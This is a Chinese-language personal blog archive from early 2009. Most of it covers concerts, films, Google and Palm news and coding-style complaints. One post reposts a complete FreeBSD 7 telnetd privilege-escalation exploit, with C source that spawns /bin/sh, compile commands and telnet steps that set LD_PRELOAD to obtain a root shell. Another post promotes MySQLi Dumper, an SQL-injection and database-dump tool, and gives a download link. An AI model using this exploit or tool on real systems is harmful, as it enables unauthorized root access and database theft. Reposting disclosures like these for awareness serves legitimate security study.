site: '10177152201056979641'; },
skin);

拿自己舉例,allenown.blogspot.com 的 site id 是 10177152201056979641,接著到 Friend Connect 後台將網址列的 id=XXX 取代,就可以看目前的狀態了。

如下
http://www.google.com/friendconnect/admin/site/metrics?id=10177152201056979641

不過我相信之後一定會直接整合的,目前想用的可以直接用用看。
切記不要直接在 Friend Connect 直接新增 Blogger 帳號,而是應該直接使用 Blogger Follower Gadget 裡面的 ID。

2009/02/27

Google Apps Status Dashboard

http://www.google.com/appsstatus

有戒於前幾天 Gmail 大爆炸,Google Release 了 Apps Status Dashboard。
比 Windows Live Messenger 的服務狀態感覺有誠意多了,不是嗎?XD

20090227_203140 - 'Apps Status Dashboard' - www_google_com_appsstatus#

貓咪的滑行特訓

真的是太可愛了啊....
雙腳開開的在地板上衝刺滑行 XD

對於沒時間+考試的輪迴感到厭倦

一切就隨意了吧
我只想做我想做的事情而已啊

不斷的這樣輪迴下來只是自殘而已
我可不想讓我快老化的身軀跟心加速老化

2009/02/26

Flash Player 10.0.22.87 安全性更新

Flash Player update available to address security vulnerabilities
http://www.adobe.com/support/security/bulletins/apsb09-01.html

A potential vulnerability has been identified in Adobe Flash Player 10.0.12.36 and earlier that could allow an attacker who successfully exploits this potential vulnerability to take control of the affected system. A malicious SWF must be loaded in Flash Player by the user for an attacker to exploit this potential vulnerability. Additional vulnerabilities have been addressed in this update. Adobe recommends users update to the most current version of Flash Player available for their platform.

檢查本機安裝的 Flash Player 版本
http://www.adobe.com/products/flash/about/

Adobe 強烈建議安裝此更新以避免安全性攻擊。

2009/02/24

SSH 亂碼小記

之前一直有人詢問 SSH 在 cat binary 或者其他字符出現亂碼無法恢復的情況該如何解決,一般很多人都是直接斷線重連,但是其實只要使用幾個指令就可以恢復畫面。

tput sgr0

或者

echo -e '\xf'

亂碼產生的原因應該是因為 '\xe' 字元在解析時出問題。

網駭科技資安部落格開張!

http://blog.net-hack.com/

今天在新系統上掃描有些成果,想說貼到 Blog 上發表一下好了。
結果想了想,為什麼不弄一個自己公司的 Blog 呢?
然後今天馬上就生出來了。XD

一些 Blog 細微的部份還需要調整,先記錄一下,賀開站。:D

2009/02/23

Symphony X Concerts 台北演唱會

這次有記得帶票了!XD
想到上次跟念德去聽 Dream Theater 的時候興沖沖結果沒帶票,整個超囧。XDDDD

一開始想說要去享受一下,17:30 就殺到劍潭青年活動中心,拿到號碼牌 026。
然後等到 18:30 就聽到廣播說入場改到 20:00....
算了,意料中的事情。
走去附近逛逛買點小東西吃,再回來慢慢等。

後來終於等到進場了,還好 026 還滿前面的,
再繼續等了半小時後終於進場了。
結果站到第三排!搖滾區根本跟 VIP 位置沒差!

暖場團 Eternal 一進來,就聽到音場轟轟轟轟轟...
主唱的聲音完全聽不到,我只聽得到鼓聲跟轟轟轟轟轟轟轟轟轟...
後來主唱很貼心的說只唱兩首,讓大家趕快聽 Symphony X。
請大家不要上 Ptt 罵他們。XDDD
太可愛了!

後來等等等等等等,終於 Symphony X 上台了。
一聽就覺得真的很慘,低音把其他全部吃光了啦...
都快變夜店了 Orz...
主唱聲音也有種在 ktv 唱歌的感覺...QQ

感覺應該是大鼓的轟轟轟加上 Bass 的聲音加上迴音把其他聲音吃光光...
然後後面又有一個瘋子亂吼亂跟著唱,但是大聲難聽又破音...
台上的聲音都聽不到了,你在那邊吼是吼三小。
差點想拿雨傘往牠鼻孔戳下去。

後來看到場地中間還滿空的,我就慢慢退退到中間去。
結果聲音也沒好到哪去,只清楚一點點。
終於聽得到主唱一點點的聲音了這樣...

我一直走到 PA 區前方聲音都還是糊到不行,
真的想問他們到底是在調啥小,真的有在工作嗎?
我整場真的是有聽到完整的鼓聲,其他都是轟轟轟轟轟轟轟轟跟尖叫和白痴的破音合唱。

很多時候主唱希望大家要一起唱的時候,結果其實還滿多人不知道歌詞的。
結果主唱好幾次摸摸鼻子這樣。XD
而且他在台上講話的時候感覺沒人聽得懂很哀傷。XD
後來終於有人聽懂了,他顯得相當欣慰。XD
然後在台上一直跟大家握手感覺相當親切!

曲目大致上跟網路上流傳的一樣,但是只能從鼓聲來辨別是什麼歌。相當哀傷。
真的是有對他們有愛才能聽得下去...
全部在腦內補完這樣。orz

喔還有附帶一提,
正妹好多喔。怎麼會這樣。而且很多都是一個人而已...
我原本以為只有一群大叔跟妖魔鬼怪的...
岳廷你應該跟我來的。

還好這次沒有帶別人去見識金屬 Live,不然大概又是毀了。Orz
真的是鳥翻天了...

喔喔這次依舊有看到認識的人,輔大以前搖研社的雙踏王!
不過不知道他有沒有認出我。XD

Set list

Prelude - Oculus ex Inferni
Set the World on Fire
Domination
Serpents Kiss
Masquerade
Paradise Lost
Inferno
Evolution
Smoke and Mirrors
Revelation

Encore:
Eve of Seduction
Sins and Shadows
Sea of Lies

2009/02/18

以前的我都只會看著地面上自己的腳步

現在的我,隨時可以看著天空。

儘管時而混濁,時而晴朗,

但是我可以看著它,深吸著屬於我的空氣。

2009/02/17

Gmail Manager 更新,解決 Gmail Offline 問題。

Gmail Manager 0.5.7.1
https://addons.mozilla.org/zh-TW/firefox/addon/1320

Gmail Manager 0.5.7.1 Discussion
http://forums.mozillazine.org/viewtopic.php?t=332634

What's new in 0.5.7.1 released 2/15/2009
- Fixed Gmail login redirect loop
自從用了 Gmail Offline 之後 Gmail Manager 就一直不正常。

而且還會有 redirect loop 的情況發生。

現在終於更新解決啦!

沒有這個套件還真不知道怎麼管理十多個 Gmail 帳號...Orz

羅技 Logitech 更改保固方式

新聞稿
http://www.logitech.com/index.cfm/172/5552
羅技電子全新產品售後服務將於2009年2月16日正式啟動,以最專業、最貼心、最高品質的服務提供予廣大消費者。位於台北的客服中心及中南部收件窗口也將於2009年4月1日起不再接受現場更換產品服務及寄件更換服務。

保固條款
http://www.logitech.com/index.cfm/447/5533
羅技電子秉持對品牌的承諾與顧客至上的原則,於2009年2月16日正式啟動全新型態的產品售後服務,讓消費者既省荷包,又可擁有更便利的產品送修方式。

消費者只需持購買證明及整組產品至原購買的經銷商(原購買店家、門市),即可獲得產品更換服務。

羅技電子全新產品售後服務將於2009年2月16日正式啟動,以最專業、最貼心、最高品質的服務提供予廣大消費者。位於台北的客服中心及中南部收件窗口也將於2009年4月1日起不再接受現場更換產品服務及寄件更換服務。


這樣以往羅技最令人激賞的保固維修方式就不存在了。
原先只要 email 或電話通知,然後將產品寄回就可以進行維修或換貨。
現在需要持購買證明到原購買店家才行,
但是一堆店家根本沒有所謂的購買證明...
未來會怎麼運作頗令人擔憂。

另外對於保固的資格也比原本嚴格,
例如「操作不當」這一項,我想很多產品就不能送修了吧。
保固貼紙跟標示磨損或模糊是一定會發生的,
滑鼠背面這麼容易刮傷,這樣也不保固我想有點糟糕。

不過這些我想應該都還算是在合情合理的範圍,
只是我想很多為了良好保固而購買羅技的人應該都會卻步了吧。

好在上個月才剛送修 Logitech G3,換了個新品回來。Orz

2009/02/15

Sudo for Vista

因為目前一些特殊需求,需要在 Vista 上類似 UNIX 的 sudo 功能。 (Windows XP 上需要 suDown :P)
使用 sudo 執行的 command,會以管理者的身分去執行。

找了一下相關的資訊,其實自己寫一個簡單的程式去讀取 command 是沒問題的。
列出目前用過沒問題的:

Sudo for Vista
http://techblogging.wordpress.com/2007/11/28/sudo-for-vista/
1: require 'Win32API'
2:
3: def shell_execute(process_name)
4: process = ''
5: process.replace(process_name)
6: se = Win32API.new("shell32", "ShellExecute", ['P','P','P','P','P','I'], 'I')
7: se.Call(nil,"runas",process,nil,nil,5)
8: end
9:
10: shell_execute(ARGV[0])

一個簡單的 Ruby 小程式,還滿推薦使用的。

Start++ for Windows Vista
http://brandontools.com/content/StartPlusPlus.aspx
功能很強大的 Start++,除了 sudo 功能之外,還有 Web search 等附加功能。
可以直接在開始功能表裡面打入關鍵字來執行功能。
算是整合型的好用工具。

假如只是想要最基本的 sudo 功能,又有安裝 Ruby 的話,推薦使用上面的小程式。
假如想要強大新奇的功能,可以嘗試看看 Start++。

FreeBSD 7 telnet daemon local privilege escalation

http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/67203

為什麼這年頭還會出現 telnetd 0-day 啊...
超無言的 Orz



# FreeBSD telnetd local/remote privilege escalation/code execution
# remote root only when accessible ftp or similar available
# tested on FreeBSD 7.0-RELEASE
# by Kingcope/2009

#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
FILE *f;
setenv("LD_PRELOAD", "", 1);
system("echo ALEX-ALEX;/bin/sh");
}
---snip-----

Then we compile this stuff.

---snip-----
#gcc -o program.o -c program.c -fPIC
#gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o
-nostartfiles
---snip-----

Then we copy the file to a known location (local root exploit)

---snip-----
#cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
---snip-----

...or we upload the library through any other available attack vector.
After that we telnet to the remote or local FreeBSD telnet daemon
with setting the LD_PRELOAD environment variable to the known location
as a telnet option before.

---snip-----
#telnet
/>auth disable SRA
/>environ define LD_PRELOAD /tmp/libno_ex.so.1.0
/>open target
---snip-----
ALEX-ALEX
#ROOTSHELL

Palm 宣布不再開發 Palm OS 機種。

http://www.precentral.net/palm-ceo-ed-colligan-talks-pre-investors

There will be no more PalmOS devices released by Palm (excepting the Centro getting released on other carriers). They're focused on webOS and Windows Mobile.

這其實是可以預見的。
希望 webOS 真的能夠再創 Palm 的奇蹟。

手上還有八台 PalmOS 的機子,從 PalmPilot、Palm m500、m505、Sony Clie SL-10、Fossil Abacus WristPDA Watch、Sony Clie TH55 到 Palm Treo 650...

現在想想 PalmOS 上一堆好用到超乎想像的程式,
最後在未來只能緬懷,不經有點哀傷啊...
希望 Palm webOS 可以再創榮景啊。
雖然我覺得原本 PalmOS 上一堆系統 Hack 至今應該不可能在任何其他系統上實現了...:(

2009/02/14

UNIX Time 1234567890 / 情人節快樂!

UNIX Time 1234567890 倒數:
http://www.1234567890day.com/
http://coolepochcountdown.com/

UNIX Time 是從 1970-01-01 0:0:0 開始計算至今的秒數。
而台灣時間 Sat Feb 14 07:31:30 CST 2009 正好是 1234567890!
在國外開 Party 慶祝的同時,我想在台灣早上七點半應該還是呼呼大睡的時候?XD

就用情人節來慶祝吧,情人節快樂!:D

2009/02/11

Burn Rate 真的是太優秀了

介紹文請看 Xdite 的 Blog
http://blog.xdite.net/?p=894

這幾天兩位同事一起團購買了 Burn Rate,也在公司熱鬧了幾天。
剛開始覺得還滿複雜的,但是其實玩過一輪之後大概就上手了。
但這殘酷的遊戲整個是把創業夢澆熄了啊啊啊啊啊啊啊~!

不過真正好玩的地方是,這遊戲真的是相當寫實。
把業界一些真實的公司、英雄人物套進去相當符合。XD

「歐你不要又把 Mr. # 丟到我們公司啊啊啊!這樣通通不 work 通通都不能結案會倒閉的啊啊啊!」
整個是歡樂到爆炸。XD

相當推薦同是資訊業界的人一起玩玩。XD

皮膚痊癒!

真的是太唬爛了。XD

之前去正康藥局買個藥想說應急,然後給老闆看了一下皮膚,老闆就推薦了個藥膏。
沒有類固醇,然後想說可能會擦整個背部所以買一大條 $375。
然後藥劑師說不要擦乳液,說身體沒事擦什麼乳液。XD

結果擦兩天幾乎好了 90%。Orz
那之前那些皮膚科是在衝啥 XD
擦了一堆藥吃了一堆藥還要複診好幾次這樣...
想賺一次跟想賺好幾次的差別這樣嗎?XD

睡一覺起來皮膚全好真的讓我以為吃了仙豆.....囧
那我去年一整年這樣皮膚爛掉是爛心酸的嗎?.....
害我損失很多寶貴的東西啊......

現在可以做好多好多事情了 :~
運動、泡溫泉、什麼都可以了 :~

唉我過去可憐的一年啊..........
因為過敏什麼事情都不能做,然後心情超差超負面......
真的是像個白痴一樣。

2009/02/07

不知不覺,我好像也成熟了一點呢。

雖然是「自以為」的成熟一點。
相較以前的我來比。

很多事情以前覺得很重要的,覺得不能讓步的,
現在覺得有什麼意義嗎?XD

就好像:
你點開了小遊戲,但是你想了一想,玩到最後自己得到了什麼?就不想玩了。
你想買一個東西,但是你想了一想,買了之後到底有沒有用呢?就不想買了。
有什麼意義嗎?

但是這跟我的熱血是相牴觸的啊...

2009/02/06

Seven Pound 七生有幸



76 分。
這中文片名翻得真的是還不錯,還好不是翻七磅還是救人七命之類的...
但是我沒有辦法給這片太高的評價。@_@

劇情的主軸是在贖罪,但是鋪陳的相當長。
導演刻意隱瞞這個劇情主軸當做一個「秘密」,但是觀眾在不理解的情況下慢慢從劇情推敲到底發生了什麼事情。立意雖然不錯,但是時間過長,甚至要到劇情中後段你才會真正的去理解到底發生什麼事情了。也看到不少人不耐煩,搔頭苦思到底真正的祕密是什麼。

釐清之後,其實劇情還是有些許單薄,而且是不值得鼓勵的走向。XD
因為之前自己毀了七個人的人生,犧牲自己去補償七個陌生人。
原先以為他會因為這七個人而重新找回生存的意義,但是沒想到最後還是一直強迫自己去回想最痛苦的回憶讓自己犧牲。

講講優點,Will Smith 的悲情苦瓜臉真的是很融入劇情。
很多時候你真的能夠去體會到他想尋死的念頭。

後面決定尋死的時候,告訴他的朋友「It's time. I love you.」,看著兩個人哭泣的臉真的是很讓人動容。

推薦心情太好的人去看。XD

搜尋引擎找不到的威秀影城官方網站

http://www.vscinemas.com.tw/

今天要訂票的時候,習慣性的搜尋一下網站,發現依舊是找不到。
Google、Yahoo都搜尋不到,不管是用威秀影城、威秀、華納威秀、"威秀影城 官方網站"還是什麼都一樣。
但是直接打 site:http://www.vscinemas.com.tw/ 卻有東西。
真的是很詭異。

神祕的 Live Search 則是第一筆就找到了。XD

記錄一下。

Keyword: 威秀影城 / 威秀 / 華納威秀 / 威秀影城官方網站 / vscinemas / 信義威秀

最近真的是燃燒生命在寫 code

真的是很熱血!

現在想想,前一位把 code 搞得那麼醜陋或許有兩個原因:(詳見這篇)
1. 只有一個人開發
2. 只想要一個人開發,即使到未來 XD

之前看過一些文章,要怎麼樣確保你未來的工作?
就是把 code 寫得別人看不懂,或者是用一些極少人會用的冷門東西。XD
更差勁的是把註解寫得搞得別人更搞不懂。

不過,台灣這個圈子就已經那麼小了。
宏觀來看,在世界上已經基本上沒什麼競爭力了。
還要搞這些降低生產力 1000% 的手法,就真的是太虧了。
我自己寫的 Code 通常變數名稱、註解、Changelog 都會相當詳細。
根據自己龜毛又完美主義的爛個性,又是一定會測試很多遍。
後面的人要接手除非他真的是什麼都不會,不然應該很好上手。

話說回來,當然我相信前一位開發者一定是第一個原因啦。:$

2009/01/29

孤單的新年

今年新年真的滿孤單的。
家人多半在國外,朋友在的也沒幾個。
大概要等年假快放完才會回來吧?

初一就莫名發燒昏睡了兩天。
今天終於好一些了,準備到中部去轉換一下心情。

沒有亂七八糟的年夜飯,沒有鬧烘烘的親戚。
難得的孤單。

希望 2009 一切順利。
也希望能夠順利出國念書。

Offline Gmail

之前就一直在想 Gmail 一定會跟 Google Docs 一樣使用 Gears 來達成 Offline Version,結果現在真的在 Labs 出現了。
要是使用 JavaScript 速度快一些的瀏覽器,例如 Google 本家的 Chrome,然後再使用 Offline 功能,基本上就可以把一般的 Mail Client 打敗了。

再使用一般的 Mail Client 透過 POP3 or IMAP 來備份,或者直接使用 Gmail Backup,基本上就是個完整的 Solution 了。

http://gmailblog.blogspot.com/2009/01/new-in-labs-offline-gmail.html


Offline Gmail (in Gmail Labs)

2009/01/26

Yes Man 沒問題先生


Image via Wikipedia


85 分!
金凱瑞真的老了啊...以前真的滿喜歡看他的片...@@"
看完這個片真的有想改變人生的感覺。
不過也要像他一樣遇到個正妹才好....XD
(被打飛)

今天想說距離午餐還有點時間,回家時間點又不太對。
就走去學者看電影了。XD 正好 Yes Man 之前就想看,就衝了。
6 排 5 號,整個就是正中間,而且全場沒有任何一個人。
放映師傅看到我來了就開始撥放了這樣。XD
前面的廣告那些全部略過從本片開始,然後片尾又讓我看到字幕完。
真的超爽的啊!!!

基本上這片真的還不錯,力度拿捏的剛剛好。
把無力的人生表現得的相當寫實。
不想做事,沒有熱忱,不想社交,什麼都想拒絕。
然後被拉去莫名其妙感覺像邪教一樣的地方大喊 Yes 來改變自己這樣。
不過我覺得他會改變最大的因素還是遇到正妹啊.............

撇開這些不提,片中講的很多事情都真的是自己想要去嘗試的。
不管是什麼都好,也很羨慕如果真的在現實生活志中有錢有閒可以的話多好。
真的在現實中這樣搞的話,第一個遇到的 100% 是經濟問題。XD
如果我也可以的話我也非常想手指一個地方就飛去那邊狂歡這樣。XDDD

想要重新檢視一下自己的人生出了什麼問題,
可以看看這個片,然後祈禱一下自己運氣夠好這樣。XD

Detroit Metal City 重金搖滾雙面人



80 分!
之前聽到有人拿我寫的影評當參考,結果踩到雷。XD
先聲明跟音樂有關的請另外看。XD

身為搖滾魂跟金屬魂真的是要看這部啊,
更何況有 KISS 的 Gene Simmons 加持(犧牲!?)演出。
整個就是非看不可啊!
加上我有定期收看原著,整個就是惡搞到翻掉。
所以就找了想看的殺皮岳廷一起去。

在絕色看整場大爆滿...還好岳廷先買票了不然就真的沒票了。
基本上已經很久沒有看到一場電影全場的氣勢那麼統一的。@__@
不管是笑,狂笑,笑到拍手,全場都是整個超統一的笑到翻掉這樣...
讓我一度懷疑到底是不是全場都是認識的人。XD
電影一開始看到岸根的老二頭馬上就有人笑到快哭是怎樣...囧

基本上都還滿原汁原味的,不過主角岸根原本在漫畫裡面並不是個娘炮啊...
而且他還是個金屬魂啊!只是弱氣了點。XD
在電影裡面變成扭扭捏捏的大娘砲真的看起來不太舒服....
不過很多笑點都是在這邊出現的。

變身成克勞薩真的是很像啊!不過要不像也是有點難。XD
很多地方都有著漫畫裡面的神韻,相當棒!
不過太過低級噁心的部份就通通拿掉了,好可惜啊~~
片中加入了夢想的成份在裡面,彌補了本篇漫畫只有惡搞而無內涵的成份。XDDD
可以說是恰到好處,不會太超過也不會太奇怪。

音樂方面真的是我扣分扣最多的地方。
不黑死不惡魔我已經有認知了,但是整個聲音出不來是怎樣啊...
感覺像是插入 CD 片段然後音量也沒調好這樣,不知道是電影院問題還是本身問題。

在歌曲對戰的部份也是整個不及格。
跟鬼刃的沒看漫畫就真的不知道是在幹嘛,軟蛋 Girl 也是秒殺,相當失色。
就算拿掉這兩串也沒什麼大影響,感覺就是像敘述過去而已。
最後面跟 Jack 的決鬥也是...太矯作了啊!!
不過也是難免啦...

最後,女社長加分啊啊!!!!
彈煙彈得那麼順是不是平常就在抽了啊!XD 太強啦!
而且跟前幾天岳廷拉我去看的伽利略裡面的人妻比...差太多啦!!!!
真的是太強了...
而且滿口髒 + FUCK 超級順,一點都沒有勉強跟卡卡的感覺。
整個就是把漫畫演活了!
真的是我本片最欣賞的角色!!

最後的最後,真的建議看看漫畫,惡搞到翻掉啊。XD
GO TO DMC!!

--
2009.01.26

2009/01/22

要開課程一定要有實力。

http://mr6offline.com/

看了某數字先生的教學講義跟流程,深深覺得要開課程真的一定要有實力啊。
假如出包了,輕則掛在台前很尷尬而已,重則誤導學員就真的是萬惡不赦了。

假如說教了一些錯誤的觀念跟作法,台下的學員就這樣學起來了。
而且是開發網站跟系統,這一錯就真的是沒完沒了了。
損失可是會很大的。

不過有熱血要開課引導大家踏入真的是個好事情。

2009/01/21

Coding Style 真的很重要。

最近在改一些 project,看到了以下如此傻眼的 code。
def c(f):
def jj(a,bb,cc):
oxoxox...
return f(a,bb,cc)
return jj

誰能告訴我什麼是 c?什麼是 f?什麼是 jj?又什麼是 a, bb, cc?
在一個不算小的 project 裡面充滿著這樣的 coding style,而且完全沒有註解。

Code 長這樣就算了,更可怕的是檔名。
XXX.py, XXXEx.py, lXXX.py, xXXX.py, nXXX.py,
checkXXX, checkXXX_new, checkXXX_new_test。
結果其實只有 checkXXX_new_test 是真正可以 run 的程式。

前人不在,後面維護開發的人只有腦中無止境的幹意。
一開始還很樂觀的說,啊那就慢慢看慢慢追就好啦!
追到最後只有想要 rm -rf / 而已。

真的是越搞越火,越搞越火,越搞越火。
很想把前面開發的那一位找出來喝個咖啡,然後拿個布袋套住他跟他玩遊戲。

發洩完畢。
Design Pattern 很重要,Coding Style 更重要。沒有好的架構好的基礎,其他一切什麼都不用談,後面的維護也相當困難,甚至有很高的機率是後面的人直接砍掉重新寫,更不用說把前面已經完成的功能、還沒完全開發完畢的功能全部弄好了。造成維護上相當大的困難,生產力我想也會相當相當低落。

有關 Coding Style 的文章,推薦 Mr. Saturday 的這篇文章。
Coding Style - 程式設計風格對軟體開發的影響

-
Update:

晚上改的時候終於看到有一個檔案有註解,而且變數名稱還滿清楚的!
結果馬上看到上面有個小註解寫著:「Copy from XXXlib」。
害我驚喜了一下。-_-

還有更猛的,Exception 是拿來做錯誤處理的,不是拿來 bypass 的...
為了不想看到錯誤訊息讓他全部 pass 又沒有做處理,是要程式怎麼去 run.........
看到系統記錄完全沒訊息還以為是正常的,結果整個是大爆炸。
害我花了幾個小時來 debug.....

2009/01/20

iPhone 終於要有複製貼上了 - Clippy

Clippy - iSpazio Exclusive: Finally the real Copy & Paste for iPhone and iPod Touch is here!



iSpazio repo 釋出了 Clippy 剪貼簿軟體,可以讓 iPhone 支援複製貼上。
目前看來使用上應該還不錯,只是還有些小缺陷不支援,也需要叫出虛擬鍵盤才能使用。
不過至少這個最令人訝異的缺點終於有 solution 了...

等有閒錢再看有沒有機會玩玩看 iPhone,當然主力還是等 Palm Pre...XD

不懂電腦真的別幫別人亂搞啊。

剛剛幫在國外唸書的阿超遠端弄筆電。

越弄越不對勁,Vista 有 UAC 加持應該不會那麼容易中標吧?還有首頁被綁架等等。
而且他也不是乖乖什麼都按允許的人,安全性更高了一些。

馬上問了一下,
「你多久沒看到 Vista 畫面變暗要你允許的那個畫面?」『這麼一說很久沒看到了...』

結果一看,UAC 被他表哥關掉,而且裝了三套防毒軟體。難怪電腦慢到整個不行。
後來把防毒移光留一套順便留下 Comodo 純防火牆,再把 UAC 開回來。應該就會順了不少。其他問題也順便解決了。

不懂電腦真的不要幫別人亂搞啊。Orz

2009/01/19

Hi!PDA 論壇「接上級單位指示整頓」

20090119_2233 - 'Hi!PDA Hi!PDA - Powered by Discuz!' - www_hi-pda_com_forum

「接上級單位指示,Hi!PDA現在關閉論壇清理整頓,待清理完畢再行開放。先祝大家新春快樂! 」

不知道是什麼東西,不過感覺很和諧。
真希望台灣網路不要有一天也變得如此和諧。Orz

星輝說我的 Blog 像天書。

星輝啊,我又不像你會畫漫畫啊啊..:~
好,今後開始平易近人走向。:~

另外過年的時候把 Blog 死人 Theme 換一下...XD

2009/01/17

Mr.6 實作網站系列課程 (解密)

http://mr6offline.com/

專為創業家(特別是不懂程式設計)的程式設計課程

太優秀了!
不過這種應該很快就會被搜尋到的網站似乎不太妙,要看要快,要備份也要快!XD

看起來這門課真的是值回票價!XDD

另外,剛剛在讀 mr6 的網站的時候...
This Account Has Exceeded Its CPU Quota 20090117_mr6


(合掌)

2009/01/15

Google 停止開發 Video, Jaiku, Notebook 等服務

Google Blog: Changes to recruiting
http://googleblog.blogspot.com/2009/01/changes-to-recruiting.html

Google Video Blog: Turning Down Uploads at Google Video
http://googlevideo.blogspot.com/2009/01/turning-down-uploads-at-google-video.html

Jaikido Blog: We're going open source
http://www.jaiku.com/blog/2009/01/15/were-going-open-source/

Google Code Blog: Changes for Jaiku and Farewell to Dodgeball and Mashup Editor
http://google-code-updates.blogspot.com/2009/01/changes-for-jaiku-and-farewell-to.html

Google Notebook Blog: Stopping development on Google Notebook
http://googlenotebookblog.blogspot.com/2009/01/stopping-development-on-google-notebook.html

cnet: Google killing Jaiku, Dodgeball, Notebook, other projects
http://news.cnet.com/8301-17939_109-10143245-2.html

Google 終於也要開始收一些服務了。其中 Google Notebook 我是持續有在使用,Jaiku 也是零零星星的使用。但是因為也感受到沒有持續在維護,慢慢的被其他服務追過去。目前看來服務大多都會持續開放使用,但是停止開發。Jaiku 的話則是改成 open source Jaiku Engine project,未來還不知道到底有沒有搞頭。@_@

目前我有在使用的服務大概就是 Google Notebook & Jaiku,Jaiku 的話目前有 Twitter & Plurk 繼續同步。Google Notebook 則或許會慢慢轉到 Evernote。@_@

Yahoo! 奇摩輸入法 v1.0 正式版

http://tw.download.yahoo.com/keykey/

今天才發現正式版已經出了。ChangeLog 在這邊

功能上增加相當相當多,一些隱藏模式的東西也公開到設定裡面了。穩定度來說比之前更好,佔用資源的情況也相當少。也照顧到了不管是微軟新注音、自然輸入法、以及酷音輸入法使用者的習慣。包括新注音的「Ctlr-Alt-G」重送字串,還有其他輸入法符號輸入的模式。

另外也做到了在一個輸入法介面中選擇各種輸入方式的功能。在 Yahoo! 奇摩輸入法中可以選擇使用注音、倉頡、嘸蝦米等輸入法,也可以直接將 .cin 表格安裝進入當做輸入法之一。

最讓我欣賞的是,此版本支援外掛以及自定 plist 功能。
這樣一些我原本覺得很糟糕的功能就可以拿來修改了,可以在 %APPDATA%\Yahoo!KeyKey\ 下自行設定 plist 檔。

例如在 http://tw.download.yahoo.com/keykey/detail_intro.php
「#一點通功能加強」裡面提到,可以自行建立 UserOneKey.plist 檔案,提供在「一點通」裡面自定功能。目前提供呼叫程式以及開啟網址,我相信之後應該會有更多應用。如此可以直接把 Yahoo 輸入法當做程式的啟動器,設定快速鍵就可以直接進行程式開啟,相當方便。

不過唯一麻煩的是,沒有一個好的按鍵來當啟動的字元。預設的「`」「~」在系統上都會常常需要按到,在使用上會有些不方便。而且更糟糕的是,一點通模式在中文及英文模式下都會啟用,所以假如你要輸入這個字元,就要將輸入法關閉才行。這一點真的是個很大的缺點。

如果跟我有一樣困擾的人,既然可以修改 plist,可以把「一點通」啟動的字元修改掉。
com.yahoo.KeyKey.OneKey.plistShortcutKey」欄位可以自己設定任意字元。
或者是 com.yahoo.KeyKey.plist 設定中,在「ActivatedAroundFilters」欄位內,直接把「OneKey」字串移除。這樣就不會有「一點通」功能了。

有一點要注意的是,當你進入選項中進行其他設定時,會將此選項覆蓋。所以每次都要記得修改此選項,這是唯一美中不足的地方。

整體上來說,Yahoo! 奇摩輸入法還是一個相當值得一用的輸入法。

2009/01/14

MySQLi Dumper v.1.4

相當好用的 SQL Injection / Dump 工具。
方便直接測試 SQL Injection, Blind Injection 等等,直接使用格式化的變數自動填入 SQL Command,不用手動自己填入欄位猜測。
同時也可以更進一步的直接下指令將 DB Dump 出來或者是直接執行程式。
另外也有支援從搜尋引擎掃瞄主機列表,並直接測試有無 SQL Injection 問題。

可以拿來測試看看自己的主機有沒有好好的阻擋類似的攻擊。

Author: fLaSh @ h4cky0u

MySQLi Dumper is a tool to dump MySQL databases with remote injection (SQL Injection)!
Is possible load all data (Databases, tables, columns and data!)...



http://rapidshare.com/files/181906454/MySQLi_Dumper_v.1.4.zip

Windows 7 in VMware

這幾天在玩 Windows 7。
在 VMware 裡面給他 1GB 的 Ram,25GB 硬碟,速度還比 Host OS Vista 還快上許多。
整體裝完大約需要 6~7 GB,安裝過程大概只需 30 分鐘。
如果正式版發行,我應該會滿想換成 Windows 7 的。

有一點要注意的是,VMware 6.5 裡面的「Accelerate 3D graphics (DirectX 9.0c)」必須要關掉。
目前對於 Windows 7 支援似乎有問題。@_@
在執行一些有特效的程式,例如踩地雷之類的,就會整個死當。
所以如果有類似問題的人,試試看關閉 3D 加速功能。

2009/01/10

更多 Palm webOS & Pre 的消息...

http://www.sprintpre.net/Default.aspx?id=1148&tabid=378

其中有幾點要注意的...

4.) Will there be other Pre models?
Yes. There will be different models, in different shapes and sizes. According to a tipster, the next Pre may be a lower-cost, candybar-style phone without a QWERTY keyboard.

看來還有低價位純觸控的版本可以期待。這樣應該可以輕薄不少。@_@
不過 Palm Treo 的強大鍵盤輸入能力真的很讓人難忘...
純觸控版本的話就希望他跟老 palm 一樣有強大的精準輸入了...


5.) Will there be a GSM Pre?
Yes. Palm is anticipated to announce a GSM/UMTS model for Europe and Asia in mid-February.
6.) When will foreign carriers get the Pre?
Palm expects to address this at a press conference at Mobile World Congress in mid-February.


看來台灣應該有得等。
大概要到第三季之後才有消息吧...


7.) How do I get my personal info into the Pre?
While the Pre won't come with desktop software, there will be solutions for people to get their Palm Desktop or Outlook info, and info from earlier Treo and Centro models, into the Pre.

這樣的話應該是都走網路同步型態。
以往的 Palm Desktop & Outlook 同步過時了這樣。
但是如果網路同步的話就必須要在網路順暢的地方才行,不然資料量一大大概就...
另外還有一點很重要的就是安全性的問題怎樣。
什麼都走網路方便是方便,但是安全性真的是很可怕...


8.) Will the Pre run Palm OS apps?
Not initially, but a third party could write a Palm OS emulator.


這真的是太慘啦!
這樣鐵定一些暴力的 Hack 通通是沒辦法動了...
一些好工具能夠正常順利跑就謝天謝地了...


14.) Is webOS Linux based?
Yes, but developers won't get access to the Linux core.

這個到時候就有意思了。
假如是 Linux 平台的話,未來就很多東西可以玩了...
當然不知道使用者跟開發者的自由度可以到多高...

2009/01/09

Palm webOS & Palm Pre

http://www.palm.com/us/products/phones/pre/

Palm 終於出手了。



外型擺脫以往 palm 商業機的感覺,感覺很不錯。

搭配了 QWERTY 實體鍵盤跟觸控螢幕、8GB user storage、含 3G, WIFI, BT2.1, GPS。
另外作業系統使用 webOS,含多工處理。充電採用「Touchstone」無線充電技術,感覺很有意思。

另外新的 webOS 看起來似乎很有意思,"If you know html, css and javascript, you can develop applications for this platform. That’s it."
看來在上面撰寫應用程式會很有意思?XD
安全性方面我想 Web 會更有意思了...

最令人擔心的就是不知道有沒有支援原本 palmOS 的程式...
假如沒有的話我想很多老使用者會很痛苦。Orz

系統著重在網路應用及與 PC 同步這個方向的確是非常正確。
一台隨身系統,假如網路功能不好,記事功能又不好,又沒有良好的同步功能,那我想使用者會用得相當痛苦。

例如 Palm 系列網路及硬體功能一向不優,Windows Mobile 同步問題多、記事功能弱,iPhone 同步及記事功能尚未成熟(沒有複製貼上..),都會造成使用者使用不便。

